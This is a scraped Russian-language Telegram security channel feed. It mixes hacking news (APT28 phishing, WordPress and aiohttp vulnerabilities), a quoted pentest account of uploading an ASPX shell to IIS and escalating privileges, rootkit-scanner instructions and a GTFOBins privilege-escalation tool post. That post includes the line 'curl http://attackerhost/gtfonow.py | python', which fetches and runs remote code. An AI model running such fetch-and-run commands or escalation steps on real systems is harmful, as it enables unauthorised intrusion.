Please open Telegram to view this post
VIEW IN TELEGRAM
Учите Python, он везде)
1 шаг — установка внешних библиотек
pip install python-decouple opencv-python pyzbar IMAPClient
decouple
— для чтения данных из файлаopencv
— для чтения изображения с QR-кодом pyzbar
— чтобы прочитать данные, закодированные в QR-кодеIMAPClient
— с помощью неё будем работать с сообщениями на почтовом сервереТак как мы будем использовать пароль приложений, а также логин от аккаунта Google, то в коде его желательно не использовать. Поэтому, необходимо создать файл «.env» с примерным содержимым:
login = "test@gmail.com"
pwd = "gffg sbbp jccj vhhi"
2 шаг — импорт библиотек
3 шаг — считывание данных из QR-кода
4 шаг — отправка письма
5 шаг — чтение почты
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Windows Matrix UHD.png
3.6 MB
На вскидку здесь их 200+, не считал
Всё удобненько сгруппировано, чтобы можно было сориентироваться и сразу понять, как...
...тестировать свою Windows, а иначе для чего это всё
Ну вы понимаете)
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Годная статья, в которой описываются разные техники повышения привилегий и закрепления в системе.
— «На одном из недавних проектов мы обнаружили возможность записывать данные в папку веб-сервера IIS без авторизации. Мы сделали ASPX-файл, загрузили его на сервер и обратились к нему через браузер. Таким образом мы получили возможность исполнять команды в рамках контекста веб-сервера, а он, так же, как MS SQL, имеет привилегию имперсонализации. Мы сделали имперсонализацию и поднялись до системных привилегий. Создали себе учетную запись, зашли на этот веб-сервер через парадную дверь и начали продвигаться по инфраструктуре.»
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
13 марта 2013 года был выпущен Kali Linux
С прошедшим днем рождения любимый дистрибутив хакеров 🎂 👾
@linuxkalii
С прошедшим днем рождения любимый дистрибутив хакеров 🎂 👾
@linuxkalii
Разработчики Tor Project объявили о запуске новой функции — мостов WebTunnel, которые работают на основе устойчивого к обнаружению HTTPT-прокси и позволяют трафику Tor лучше смешиваться с обычным HTTPS-трафиком.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду
sudo
, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.Основные особенности:
curl http://attackerhost/gtfonow.py | python
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Все инструменты и ссылки бесплатны и постоянно обновляются.
🔗 https://colliertr.github.io/OSINT-dashboard/
#OSINT #OSINT4Good
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Информационная безопасность
⚠️ Российские хакеры APT 28 запустили масштабные фишинговые атаки, нацеленные на правительства и неправительственные организации по всей Европе, Северной и Южной Америке и Азии.
В этих атаках используются поддельные документы и письма, которые выглядят официальными.
Подробнее: https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html
#кибербезопасность
Hacking
В этих атаках используются поддельные документы и письма, которые выглядят официальными.
Подробнее: https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html
#кибербезопасность
Hacking
🚨 Обнаружена критическая ошибка в плагинах miniOrange для WordPress.
Если вы используете miniorange сканер вредоносных программ (≤ 4.7.2) или брандмауэр веб-приложений (≤ 2.1.1), НЕМЕДЛЕННО УДАЛИТЕ ИХ.
Уязвимость позволяет злоумышленникам завладеть вашим сайтом.
Подробнее: https://thehackernews.com/2024/03/wordpress-admins-urged-to-remove.html
@linuxkalii
Если вы используете miniorange сканер вредоносных программ (≤ 4.7.2) или брандмауэр веб-приложений (≤ 2.1.1), НЕМЕДЛЕННО УДАЛИТЕ ИХ.
Уязвимость позволяет злоумышленникам завладеть вашим сайтом.
Подробнее: https://thehackernews.com/2024/03/wordpress-admins-urged-to-remove.html
@linuxkalii
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
aiohttp
— это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. aiohttp
часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.aiohttp
обновилась до версии 3.9.2, в которой устранили уязвимость CVE-2024-23334. Это path traversal баг, затрагивающий все версии aiohttp (начиная с 3.9.1) и старше, который позволяет удаленным злоумышленникам без авторизации получить доступ к файлам на уязвимых серверах.follow_symlinks
в значение True
для статичных маршрутов, что позволяет получить несанкционированный доступ к файлам за пределами статичного корневого каталога сервера.@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Только вдумайтесь: из каких-то «шорохов» можно вычислить рисунок на подушечке пальца, это фантастически красивая атака по сторонним каналам!
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Руткит — это вредоносная программа, которая позволяет неавторизованному пользователю (читай злоумышленнику) получить доступ к системе и ее ограниченному программному обеспечению.
В этом посте мы поговорим о 2 самых известных программах с открытым исходным кодом —
chkrootkit
и rkhunter
. Мы можем установить их в Kali Linux или любой другой дистрибутив Linux и проверить наш компьютер на наличие руткитов.chkrootkit
— это простая программа, которая может гарантировать, что наш Kali Linux не был заражен. Мы также можем запустить chkrootkit
на других дистрибутивах Linux, установив его на эти системы.Ставится
chkrootkit
очевидным образом:sudo apt install chkrootkit
Для проверки на наличие руткитов нужно просто запустить
chkrootkit
:sudo chkrootkit
rkhunter
— это инструмент на базе Linux/Unix для сканирования возможных руткитов, бэкдоров и локальных эксплойтов.Для этого он сравнивает SHA-1 хэши важных файлов с известными хорошими файлами в онлайн-базах данных, ищет каталоги по умолчанию (руткитов), неправильные разрешения, скрытые файлы, подозрительные строки в модулях ядра и специальные тесты для Linux.
Он не поставляется предустановленным в Kali Linux, поэтому:
sudo apt install rkhunter
После установки мы можем запустить
rkhunter
для сканирования всей нашей системы:sudo rkhunter -c
Также сохраняет выходной файл журнала в
/var/log/rkhunter.log
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM